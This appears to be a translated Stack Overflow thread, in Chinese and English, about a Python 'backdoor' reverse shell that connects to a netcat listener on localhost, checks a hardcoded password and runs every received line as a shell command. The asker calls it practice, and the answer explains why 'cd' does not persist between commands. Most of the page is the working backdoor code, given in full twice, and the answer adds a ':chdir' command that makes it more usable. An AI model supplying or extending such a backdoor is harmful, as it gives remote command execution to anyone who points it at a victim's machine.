后门 Shell 不允许我更改目录 [英] Backdoor Shell doesn't allow me to change Directory

问题描述

下面你可以看到一个 Python 脚本，它在端口 1234 上建立到我的机器的连接.使用 Netcat 我可以监听那个端口，然后使用终端在我的机器上执行操作(我知道这是微不足道的，但它只是用于练习).

Below you can see a Python Script which establishes a connection to my machine on port 1234. Using Netcat I can listen on that port and then perform actions on my machine using the terminal (I know that this is trivial, but its just for practicing).

现在的问题是诸如ls、mkdir、pwd、rm 甚至ls/root/Desktop/"之类的命令都在工作，但是cd/root/Desktop"或cd .."却不起作用，这实际上非常糟糕.输入cd .."不会返回任何错误消息，但它也不会更改目录.我无法离开我的 python 目录.

Now the problem is that the commands like "ls, mkdir, pwd, rm or even "ls /root/Desktop/" are working, but however "cd /root/Desktop" or "cd .." are not working, which is actually really bad. Typing in "cd .." is not returning any error message, but its also not changing the directory. I can not leave my python directory.

脚本如下:

#! /usr/bin/python
import socket
import subprocess

host = "localhost"
port = 1234
passwd = "hacking"


def login():
    global s
    s.send("Login: ")
    pwd = s.recv(1024)

    if pwd.strip() != passwd:
        login()
    else:
        s.send("Connected #> ")
        shell()

def shell():
    while True:
        data = s.recv(1024)

        if data.strip() == ":kill":
              break

        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = proc.stdout.read() + proc.stderr.read()
        s.send(output)
        s.send("#> ")



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()

我从 这里 得到它.

谁能帮帮我?知道为什么我不能离开目录吗?提前致谢！

Can anyone help me out? Any idea why I cannot leave the directory? Thanks in advance!

推荐答案

它实际上工作得很好.如果您在单个命令中尝试此操作会怎样: cd/other/directory;ls.您会看到该目录实际上在该命令的持续时间内更改"了.每个新命令都将获得一个新环境(因此回到相同的原始目录).如果您真的想在命令之间更改服务器上下文"，那么您需要在 python 中执行此操作.以下是添加到您提供的代码中的脏示例:

It actually works fine. what if you tried this in a single command: cd /other/directory; ls. You'll see that the directory did in fact "change" for the duration of that command. Every new command will gets a fresh environment (so back to the same original directory). If you really want to change the "server context" in between commands then you need to do that in python. Below is a dirty example added onto the code you provided:

#! /usr/bin/python
import socket
import subprocess
import os

host = "localhost"
port = 12345
passwd = "hacking"


def login():
    global s
    s.send("Login: ")
    pwd = s.recv(1024)

    if pwd.strip() != passwd:
        login()
    else:
        s.send("Connected #> ")
        shell()

def shell():
    while True:
        data = s.recv(1024).strip()

        if data == ":kill":
              break

        try:
            cmd, params = data.split(" ", 1)
            if cmd == ":chdir":
                os.chdir(params)
                print "chdir to %s" % (params)
                s.send("#> ")
                continue
        except:
            pass

        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = proc.stdout.read() + proc.stderr.read()
        s.send(output)
        s.send("#> ")



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()

与您的:kill"命令相同，如果脚本看到的是:chdir/new/directory"，则python执行chdir函数，否则将其传递给Popen.

Same idea as your ":kill" command, if the script see's a ":chdir /new/directory" then python executes the chdir function, otherwise pass it on to Popen.

这篇关于后门 Shell 不允许我更改目录的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！